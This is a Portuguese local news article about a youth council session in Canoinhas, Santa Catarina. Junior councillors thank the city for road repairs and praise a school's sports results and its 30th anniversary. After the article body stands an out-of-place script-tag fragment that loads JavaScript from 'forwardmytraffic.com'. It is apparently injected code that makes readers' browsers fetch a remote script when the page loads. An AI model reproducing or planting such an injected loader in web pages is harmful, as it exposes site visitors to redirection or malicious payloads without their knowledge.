InícioPolíticaVereadora mirim Hellen agradece por trabalho realizado na estrada da localidade de...

Vereadora mirim Hellen agradece por trabalho realizado na estrada da localidade de Cachoeira

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio estimado em R$ 3,5 milhões

As seis dezenas do concurso 2.716 da Mega-Sena serão...

Pedidos de isenção da taxa do Enem podem ser feitos até sexta-feira

Termina na próxima sexta-feira (26) o prazo para pedir...

Entenda o Programa Acredita, que pretende ampliar acesso ao crédito

Com o potencial de destravar até R$ 30 bilhões...

No uso da tribuna na sessão dessa terça, 24, a vereadora mirim Hellen Cordeiro, agradeceu a prefeitura de Canoinhas pelas obras realizadas nas estradas da localidade de Cachoeira. “O trabalho foi muito bem feito e para quem mora no interior e depende dessas estradas é muito importante que elas estejam em boas condições sempre”, falou Hellen.

 

Enquanto foram passadas no telão, fotos do antes e depois das melhorias na estrada da localidade, a vereadora mirim destacou que, sabendo da extensão das estradas do interior do município que cortam o interior, é necessário que os responsáveis pela conservação mantenham uma rotina de reparos preventivos com um calendário de obras e uma equipe para tratar das necessidades, evitando o que aconteceu na localidade no passado, que ficou por um tempo sem manutenção.

 

Também no uso da tribuna, a presidente e vereadora mirim Brenda Komochena falou em nome dos alunos e professores da Escola Básica Municipal (EBM) Severo de Andrade. Brenda parabenizou todos os alunos que participaram dos Jogos Escolares de Santa Catarina na categoria sub 17 na modalidade de voleibol de quadra, obtendo a 4ª colocação e no voleibol de areia, que se classificou em 1º lugar se classificando para representar o município na etapa microrregional, que acontece no próximo mês.

Vereadora mirim Brenda também destacou no uso da tribuna, 30 anos da Escola Severo de Andrade

A vereadora mirim ainda destacou os 30 anos comemorados pela EBM Severo de Andrade no mês de abril. “Os alunos fizeram diversos poemas e desenhos contando um pouco de suas histórias na unidade escolar, e esses belos trabalhos estão expostos para fazer uma homenagem a nossa querida escola”.

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.